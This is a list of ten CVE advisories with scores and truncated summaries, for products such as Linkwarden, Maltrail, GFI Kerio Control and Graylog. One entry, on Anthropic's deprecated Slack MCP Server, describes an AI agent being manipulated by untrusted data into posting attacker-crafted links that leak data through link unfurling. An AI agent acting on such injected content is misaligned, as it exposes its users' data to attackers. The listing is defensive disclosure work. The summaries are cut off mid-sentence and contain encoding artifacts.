8.7
CVE-2025-49588 - Linkwarden Local File Inclusion Vulnerability
Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In version 2.10.2, the server accepts links of format file:///etc/passwd and doesn't do any validation before sending them to parsers and playwright, this can result in leak of other uโฆ
10
CVE-2025-34073 - stamparm/maltrail <=0.54 Remote Command Execution
An unauthenticated command injection vulnerability exists in stamparm/maltrail (Maltrail) versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. This occurs due to unsafe handling of user-supplied inputโฆ
9.3
CVE-2025-34072 - Anthropic Slack MCP Server Data Exfiltration via Link Unfurling
A data exfiltration vulnerability exists in Anthropicโs deprecated Slack Model Context Protocol (MCP) Server via automatic link unfurling. When an AI agent using the Slack MCP Server processes untrusted data, it can be manipulated to generate messages containing attacker-crafted hyperlinks embeddinโฆ
9.4
CVE-2025-34071 - GFI Kerio Control Unsigned System Image Upload Root Code Execution
A remote code execution vulnerability in GFI Kerio Control 9.4.5 allows attackers with administrative access to upload and execute arbitrary code through the firmware upgrade feature. The system upgrade mechanism accepts unsigned .img files, which can be modified to include malicious scripts withinโฆ
10
CVE-2025-34070 - GFI Kerio Control GFIAgent Missing Authentication on Administrative Interfaces
A missing authentication vulnerability in the GFIAgent component of GFI Kerio Control 9.4.5 allows unauthenticated remote attackers to perform privileged operations. The GFIAgent service, responsible for integration with GFI AppManager, exposes HTTP services on ports 7995 and 7996 without proper auโฆ
9.5
CVE-2025-34069 - GFI Kerio Control GFIAgent Authentication Bypass via Proxy Forwarding
An authentication bypass vulnerability exists in GFI Kerio Control 9.4.5 due to insecure default proxy configuration and weak access control in the GFIAgent service. The non-transparent proxy on TCP port 3128 can be used to forward unauthenticated requests to internal services such as GFIAgent, bypโฆ
10
CVE-2025-34067 - Hikvision Integrated Security Management Platform Remote Command Execution via applyCT Fastjson
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an aโฆ
8.7
CVE-2025-34057 - Ruijie NBR Router Administrative Credential Disclosure
An information disclosure vulnerability exists in Ruijie NBR series routers (known to affect NBR2000G, NBR1300G, and NBR1000 models) via the /WEB_VMS/LEVEL15/ endpoint. By crafting a specific POST request with modified Cookie headers and specially formatted parameters, an unauthenticated attacker cโฆ
4.9
CVE-2025-27026 - Improper Access Control Granularity impacting Infinera G42
A missing double-check feature in the WebGUI for CLI deactivation in Infinera G42 version R6.1.3 allows an authenticated administrator to make other management interfaces unavailable via local and network interfaces. The CLI deactivation via the WebGUI does not only stop CLI interface but deactivโฆ
8.8
CVE-2025-53106 - Graylog vulnerable to privilege escalation through API tokens
Graylog is a free and open log management platform. In versions 6.2.0 to before 6.2.4 and 6.3.0-alpha.1 to before 6.3.0-rc.2, Graylog users can gain elevated privileges by creating and using API tokens for the local Administrator or any other user for whom the malicious user knows the ID. For the aโฆ